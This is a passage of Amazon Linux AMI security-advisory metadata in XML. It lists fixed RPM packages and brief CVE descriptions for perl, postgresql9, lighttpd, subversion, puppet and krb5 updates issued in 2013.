epoch="1" arch="x86_64"><filename>Packages/perl-ExtUtils-CBuilder-0.27-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Time-HiRes" version="1.9721" release="130.17.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-Time-HiRes-1.9721-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Digest-SHA" version="5.47" release="130.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Digest-SHA-5.47-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Object-Accessor" version="0.34" release="130.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Object-Accessor-0.34-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Log-Message" version="0.02" release="130.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Log-Message-0.02-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Time-Piece" version="1.15" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Time-Piece-1.15-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Module-Build" version="0.3500" release="130.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Module-Build-0.3500-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Compress-Zlib" version="2.020" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Compress-Zlib-2.020-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-libs" version="5.10.1" release="130.17.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-libs-5.10.1-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-version" version="0.77" release="130.17.amzn1" epoch="3" arch="x86_64"><filename>Packages/perl-version-0.77-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Module-Load-Conditional" version="0.30" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Module-Load-Conditional-0.30-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-IO-Compress-Zlib" version="2.020" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-IO-Compress-Zlib-2.020-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-File-Fetch" version="0.26" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-File-Fetch-0.26-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-ExtUtils-ParseXS" version="2.2003.0" release="130.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-ExtUtils-ParseXS-2.2003.0-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Parse-CPAN-Meta" version="1.40" release="130.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Parse-CPAN-Meta-1.40-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Package-Constants" version="0.02" release="130.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Package-Constants-0.02-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-IPC-Cmd" version="0.56" release="130.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-IPC-Cmd-0.56-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-core" version="5.10.1" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-core-5.10.1-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Module-Load" version="0.16" release="130.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Module-Load-0.16-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Test-Harness" version="3.17" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Test-Harness-3.17-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-ExtUtils-MakeMaker" version="6.55" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-ExtUtils-MakeMaker-6.55-130.17.amzn1.x86_64.rpm</filename></package><package name="perl" version="5.10.1" release="130.17.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-5.10.1-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-IO-Compress-Bzip2" version="2.020" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-IO-Compress-Bzip2-2.020-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Locale-Maketext-Simple" version="0.18" release="130.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Locale-Maketext-Simple-0.18-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Pod-Simple" version="3.13" release="130.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Pod-Simple-3.13-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-suidperl" version="5.10.1" release="130.17.amzn1" epoch="4" arch="i686"><filename>Packages/perl-suidperl-5.10.1-130.17.amzn1.i686.rpm</filename></package><package name="perl-Pod-Escapes" version="1.04" release="130.17.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Pod-Escapes-1.04-130.17.amzn1.i686.rpm</filename></package><package name="perl-libs" version="5.10.1" release="130.17.amzn1" epoch="4" arch="i686"><filename>Packages/perl-libs-5.10.1-130.17.amzn1.i686.rpm</filename></package><package name="perl-version" version="0.77" release="130.17.amzn1" epoch="3" arch="i686"><filename>Packages/perl-version-0.77-130.17.amzn1.i686.rpm</filename></package><package name="perl-IO-Compress-Base" version="2.020" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-IO-Compress-Base-2.020-130.17.amzn1.i686.rpm</filename></package><package name="perl-Archive-Tar" version="1.58" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Archive-Tar-1.58-130.17.amzn1.i686.rpm</filename></package><package name="perl-Test-Harness" version="3.17" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Test-Harness-3.17-130.17.amzn1.i686.rpm</filename></package><package name="perl-Module-Load" version="0.16" release="130.17.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Module-Load-0.16-130.17.amzn1.i686.rpm</filename></package><package name="perl-Compress-Raw-Bzip2" version="2.020" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Compress-Raw-Bzip2-2.020-130.17.amzn1.i686.rpm</filename></package><package name="perl-Archive-Extract" version="0.38" release="130.17.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Archive-Extract-0.38-130.17.amzn1.i686.rpm</filename></package><package name="perl-IO-Compress-Bzip2" version="2.020" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-IO-Compress-Bzip2-2.020-130.17.amzn1.i686.rpm</filename></package><package name="perl-IPC-Cmd" version="0.56" release="130.17.amzn1" epoch="1" arch="i686"><filename>Packages/perl-IPC-Cmd-0.56-130.17.amzn1.i686.rpm</filename></package><package name="perl-CGI" version="3.51" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-CGI-3.51-130.17.amzn1.i686.rpm</filename></package><package name="perl-Term-UI" version="0.20" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Term-UI-0.20-130.17.amzn1.i686.rpm</filename></package><package name="perl" version="5.10.1" release="130.17.amzn1" epoch="4" arch="i686"><filename>Packages/perl-5.10.1-130.17.amzn1.i686.rpm</filename></package><package name="perl-ExtUtils-CBuilder" version="0.27" release="130.17.amzn1" epoch="1" arch="i686"><filename>Packages/perl-ExtUtils-CBuilder-0.27-130.17.amzn1.i686.rpm</filename></package><package name="perl-Package-Constants" version="0.02" release="130.17.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Package-Constants-0.02-130.17.amzn1.i686.rpm</filename></package><package name="perl-Module-Loaded" version="0.02" release="130.17.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Module-Loaded-0.02-130.17.amzn1.i686.rpm</filename></package><package name="perl-core" version="5.10.1" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-core-5.10.1-130.17.amzn1.i686.rpm</filename></package><package name="perl-Object-Accessor" version="0.34" release="130.17.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Object-Accessor-0.34-130.17.amzn1.i686.rpm</filename></package><package name="perl-Compress-Raw-Zlib" version="2.023" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Compress-Raw-Zlib-2.023-130.17.amzn1.i686.rpm</filename></package><package name="perl-devel" version="5.10.1" release="130.17.amzn1" epoch="4" arch="i686"><filename>Packages/perl-devel-5.10.1-130.17.amzn1.i686.rpm</filename></package><package name="perl-Module-CoreList" version="2.18" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Module-CoreList-2.18-130.17.amzn1.i686.rpm</filename></package><package name="perl-Test-Simple" version="0.92" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Test-Simple-0.92-130.17.amzn1.i686.rpm</filename></package><package name="perl-debuginfo" version="5.10.1" release="130.17.amzn1" epoch="4" arch="i686"><filename>Packages/perl-debuginfo-5.10.1-130.17.amzn1.i686.rpm</filename></package><package name="perl-Locale-Maketext-Simple" version="0.18" release="130.17.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Locale-Maketext-Simple-0.18-130.17.amzn1.i686.rpm</filename></package><package name="perl-CPANPLUS" version="0.88" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-CPANPLUS-0.88-130.17.amzn1.i686.rpm</filename></package><package name="perl-Parse-CPAN-Meta" version="1.40" release="130.17.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Parse-CPAN-Meta-1.40-130.17.amzn1.i686.rpm</filename></package><package name="perl-IO-Zlib" version="1.09" release="130.17.amzn1" epoch="1" arch="i686"><filename>Packages/perl-IO-Zlib-1.09-130.17.amzn1.i686.rpm</filename></package><package name="perl-ExtUtils-Embed" version="1.28" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-ExtUtils-Embed-1.28-130.17.amzn1.i686.rpm</filename></package><package name="perl-Digest-SHA" version="5.47" release="130.17.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Digest-SHA-5.47-130.17.amzn1.i686.rpm</filename></package><package name="perl-Compress-Zlib" version="2.020" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Compress-Zlib-2.020-130.17.amzn1.i686.rpm</filename></package><package name="perl-Params-Check" version="0.26" release="130.17.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Params-Check-0.26-130.17.amzn1.i686.rpm</filename></package><package name="perl-Time-HiRes" version="1.9721" release="130.17.amzn1" epoch="4" arch="i686"><filename>Packages/perl-Time-HiRes-1.9721-130.17.amzn1.i686.rpm</filename></package><package name="perl-Module-Build" version="0.3500" release="130.17.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Module-Build-0.3500-130.17.amzn1.i686.rpm</filename></package><package name="perl-Time-Piece" version="1.15" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Time-Piece-1.15-130.17.amzn1.i686.rpm</filename></package><package name="perl-Log-Message" version="0.02" release="130.17.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Log-Message-0.02-130.17.amzn1.i686.rpm</filename></package><package name="perl-Module-Pluggable" version="3.90" release="130.17.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Module-Pluggable-3.90-130.17.amzn1.i686.rpm</filename></package><package name="perl-CPAN" version="1.9402" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-CPAN-1.9402-130.17.amzn1.i686.rpm</filename></package><package name="perl-ExtUtils-ParseXS" version="2.2003.0" release="130.17.amzn1" epoch="1" arch="i686"><filename>Packages/perl-ExtUtils-ParseXS-2.2003.0-130.17.amzn1.i686.rpm</filename></package><package name="perl-Log-Message-Simple" version="0.04" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Log-Message-Simple-0.04-130.17.amzn1.i686.rpm</filename></package><package name="perl-Pod-Simple" version="3.13" release="130.17.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Pod-Simple-3.13-130.17.amzn1.i686.rpm</filename></package><package name="perl-ExtUtils-MakeMaker" version="6.55" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-ExtUtils-MakeMaker-6.55-130.17.amzn1.i686.rpm</filename></package><package name="perl-Module-Load-Conditional" version="0.30" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Module-Load-Conditional-0.30-130.17.amzn1.i686.rpm</filename></package><package name="perl-IO-Compress-Zlib" version="2.020" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-IO-Compress-Zlib-2.020-130.17.amzn1.i686.rpm</filename></package><package name="perl-parent" version="0.221" release="130.17.amzn1" epoch="1" arch="i686"><filename>Packages/perl-parent-0.221-130.17.amzn1.i686.rpm</filename></package><package name="perl-File-Fetch" version="0.26" release="130.17.amzn1" epoch="0" arch="i686"><filename>Packages/perl-File-Fetch-0.26-130.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-178</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-178: critical priority package update for postgresql9</title><issued date="2013-04-04 11:49:00" /><updated date="2014-09-15 22:49:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1901:
929328:
CVE-2013-1901 postgresql: Improper user privilege check for on-line backups
CVE-2013-1900:
929255:
CVE-2013-1900 postgresql: Improper randomization of pgcrypto functions (requiring random seed)
CVE-2013-1899:
929223:
CVE-2013-1899 postgresql: Insecure switch parsing
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1899" title="" id="CVE-2013-1899" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1900" title="" id="CVE-2013-1900" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1901" title="" id="CVE-2013-1901" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql9-test" version="9.2.4" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-test-9.2.4-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql9-server" version="9.2.4" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-server-9.2.4-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql9-docs" version="9.2.4" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-docs-9.2.4-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql9-debuginfo" version="9.2.4" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-debuginfo-9.2.4-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql9-pltcl" version="9.2.4" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-pltcl-9.2.4-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql9-upgrade" version="9.2.4" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-upgrade-9.2.4-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql9-devel" version="9.2.4" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-devel-9.2.4-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql9-libs" version="9.2.4" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-libs-9.2.4-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql9-plperl" version="9.2.4" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-plperl-9.2.4-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql9" version="9.2.4" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-9.2.4-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql9-plpython" version="9.2.4" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-plpython-9.2.4-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql9-contrib" version="9.2.4" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-contrib-9.2.4-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql9-libs" version="9.2.4" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-libs-9.2.4-1.35.amzn1.i686.rpm</filename></package><package name="postgresql9-plperl" version="9.2.4" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-plperl-9.2.4-1.35.amzn1.i686.rpm</filename></package><package name="postgresql9-docs" version="9.2.4" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-docs-9.2.4-1.35.amzn1.i686.rpm</filename></package><package name="postgresql9-contrib" version="9.2.4" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-contrib-9.2.4-1.35.amzn1.i686.rpm</filename></package><package name="postgresql9-pltcl" version="9.2.4" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-pltcl-9.2.4-1.35.amzn1.i686.rpm</filename></package><package name="postgresql9-test" version="9.2.4" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-test-9.2.4-1.35.amzn1.i686.rpm</filename></package><package name="postgresql9-devel" version="9.2.4" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-devel-9.2.4-1.35.amzn1.i686.rpm</filename></package><package name="postgresql9" version="9.2.4" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-9.2.4-1.35.amzn1.i686.rpm</filename></package><package name="postgresql9-plpython" version="9.2.4" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-plpython-9.2.4-1.35.amzn1.i686.rpm</filename></package><package name="postgresql9-upgrade" version="9.2.4" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-upgrade-9.2.4-1.35.amzn1.i686.rpm</filename></package><package name="postgresql9-debuginfo" version="9.2.4" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-debuginfo-9.2.4-1.35.amzn1.i686.rpm</filename></package><package name="postgresql9-server" version="9.2.4" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-server-9.2.4-1.35.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-179</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-179: medium priority package update for lighttpd</title><issued date="2013-04-11 17:24:00" /><updated date="2014-09-15 22:49:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2012-5533:
The http_request_split_value function in request.c in lighttpd before 1.4.32 allows remote attackers to cause a denial of service (infinite loop) via a request with a header containing an empty token, as demonstrated using the "Connection: TE,,Keep-Alive" header.
878213:
CVE-2012-5533 lighttpd: Denial of Service via malformed Connection headers
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5533" title="" id="CVE-2012-5533" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="lighttpd-debuginfo" version="1.4.31" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-debuginfo-1.4.31-1.5.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_mysql_vhost" version="1.4.31" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-mod_mysql_vhost-1.4.31-1.5.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_geoip" version="1.4.31" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-mod_geoip-1.4.31-1.5.amzn1.x86_64.rpm</filename></package><package name="lighttpd-fastcgi" version="1.4.31" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-fastcgi-1.4.31-1.5.amzn1.x86_64.rpm</filename></package><package name="lighttpd" version="1.4.31" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-1.4.31-1.5.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_geoip" version="1.4.31" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-mod_geoip-1.4.31-1.5.amzn1.i686.rpm</filename></package><package name="lighttpd-debuginfo" version="1.4.31" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-debuginfo-1.4.31-1.5.amzn1.i686.rpm</filename></package><package name="lighttpd" version="1.4.31" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-1.4.31-1.5.amzn1.i686.rpm</filename></package><package name="lighttpd-mod_mysql_vhost" version="1.4.31" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-mod_mysql_vhost-1.4.31-1.5.amzn1.i686.rpm</filename></package><package name="lighttpd-fastcgi" version="1.4.31" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-fastcgi-1.4.31-1.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-180</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-180: medium priority package update for subversion</title><issued date="2013-04-11 17:27:00" /><updated date="2014-09-15 22:50:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1849:
A NULL pointer dereference flaw was found in the way the mod_dav_svn module handled PROPFIND requests on activity URLs. A remote attacker could use this flaw to cause the httpd process serving the request to crash.
CVE-2013-1847:
Two NULL pointer dereference flaws were found in the way the mod_dav_svn module handled LOCK requests on certain types of URLs. A malicious, remote user could use these flaws to cause the httpd process serving the request to crash.
CVE-2013-1846:
Two NULL pointer dereference flaws were found in the way the mod_dav_svn module handled LOCK requests on certain types of URLs. A malicious, remote user could use these flaws to cause the httpd process serving the request to crash.
CVE-2013-1845:
A flaw was found in the way the mod_dav_svn module handled large numbers of properties (such as those set with the "svn propset" command). A malicious, remote user could use this flaw to cause the httpd process serving the request to consume an excessive amount of system memory.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1845" title="" id="CVE-2013-1845" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1846" title="" id="CVE-2013-1846" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1847" title="" id="CVE-2013-1847" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1849" title="" id="CVE-2013-1849" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0737.html" title="" id="RHSA-2013:0737" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="subversion-debuginfo" version="1.7.9" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-debuginfo-1.7.9-1.28.amzn1.x86_64.rpm</filename></package><package name="subversion-javahl" version="1.7.9" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-javahl-1.7.9-1.28.amzn1.x86_64.rpm</filename></package><package name="subversion-tools" version="1.7.9" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-tools-1.7.9-1.28.amzn1.x86_64.rpm</filename></package><package name="subversion-perl" version="1.7.9" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-perl-1.7.9-1.28.amzn1.x86_64.rpm</filename></package><package name="subversion" version="1.7.9" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-1.7.9-1.28.amzn1.x86_64.rpm</filename></package><package name="mod_dav_svn" version="1.7.9" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_dav_svn-1.7.9-1.28.amzn1.x86_64.rpm</filename></package><package name="subversion-devel" version="1.7.9" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-devel-1.7.9-1.28.amzn1.x86_64.rpm</filename></package><package name="subversion-python" version="1.7.9" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-python-1.7.9-1.28.amzn1.x86_64.rpm</filename></package><package name="subversion-ruby" version="1.7.9" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-ruby-1.7.9-1.28.amzn1.x86_64.rpm</filename></package><package name="subversion-libs" version="1.7.9" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-libs-1.7.9-1.28.amzn1.x86_64.rpm</filename></package><package name="subversion-devel" version="1.7.9" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-devel-1.7.9-1.28.amzn1.i686.rpm</filename></package><package name="subversion-javahl" version="1.7.9" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-javahl-1.7.9-1.28.amzn1.i686.rpm</filename></package><package name="subversion-perl" version="1.7.9" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-perl-1.7.9-1.28.amzn1.i686.rpm</filename></package><package name="subversion-ruby" version="1.7.9" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-ruby-1.7.9-1.28.amzn1.i686.rpm</filename></package><package name="mod_dav_svn" version="1.7.9" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/mod_dav_svn-1.7.9-1.28.amzn1.i686.rpm</filename></package><package name="subversion-libs" version="1.7.9" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-libs-1.7.9-1.28.amzn1.i686.rpm</filename></package><package name="subversion-debuginfo" version="1.7.9" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-debuginfo-1.7.9-1.28.amzn1.i686.rpm</filename></package><package name="subversion-tools" version="1.7.9" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-tools-1.7.9-1.28.amzn1.i686.rpm</filename></package><package name="subversion-python" version="1.7.9" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-python-1.7.9-1.28.amzn1.i686.rpm</filename></package><package name="subversion" version="1.7.9" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-1.7.9-1.28.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-181</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-181: medium priority package update for puppet</title><issued date="2013-04-11 17:32:00" /><updated date="2014-09-15 22:50:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1640:
The (1) template and (2) inline_template functions in the master server in Puppet before 2.6.18, 2.7.x before 2.7.21, and 3.1.x before 3.1.1, and Puppet Enterprise before 1.2.7 and 2.7.x before 2.7.2 allows remote authenticated users to execute arbitrary code via a crafted catalog request.
919783:
CVE-2013-1640 Puppet: catalog request code execution
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1640" title="" id="CVE-2013-1640" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="puppet-debuginfo" version="2.7.21" release="2.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-debuginfo-2.7.21-2.11.amzn1.x86_64.rpm</filename></package><package name="puppet" version="2.7.21" release="2.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-2.7.21-2.11.amzn1.x86_64.rpm</filename></package><package name="puppet-server" version="2.7.21" release="2.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-server-2.7.21-2.11.amzn1.x86_64.rpm</filename></package><package name="puppet-debuginfo" version="2.7.21" release="2.11.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-debuginfo-2.7.21-2.11.amzn1.i686.rpm</filename></package><package name="puppet-server" version="2.7.21" release="2.11.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-server-2.7.21-2.11.amzn1.i686.rpm</filename></package><package name="puppet" version="2.7.21" release="2.11.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-2.7.21-2.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-182</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-182: medium priority package update for krb5</title><issued date="2013-04-18 13:58:00" /><updated date="2014-09-15 22:51:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1416:
A NULL pointer dereference flaw was found in the way the MIT Kerberos KDC processed certain TGS (Ticket-granting Server) requests. A remote, authenticated attacker could use this flaw to crash the KDC via a specially-crafted TGS request.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1416" title="" id="CVE-2013-1416" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0748.html" title="" id="RHSA-2013:0748" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="krb5-workstation" version="1.10.3" release="10.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-workstation-1.10.3-10.25.amzn1.x86_64.rpm</filename></package><package name="krb5-server" version="1.10.3" release="10.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-1.10.3-10.25.amzn1.x86_64.rpm</filename></package><package name="krb5-devel" version="1.10.3" release="10.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-devel-1.10.3-10.25.amzn1.x86_64.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.10.3" release="10.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-pkinit-openssl-1.10.3-10.25.amzn1.x86_64.rpm</filename></package><package name="krb5-libs" version="1.10.3" release="10.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-libs-1.10.3-10.25.amzn1.x86_64.rpm</filename></package><package name="krb5-debuginfo" version="1.10.3" release="10.25.amzn1" 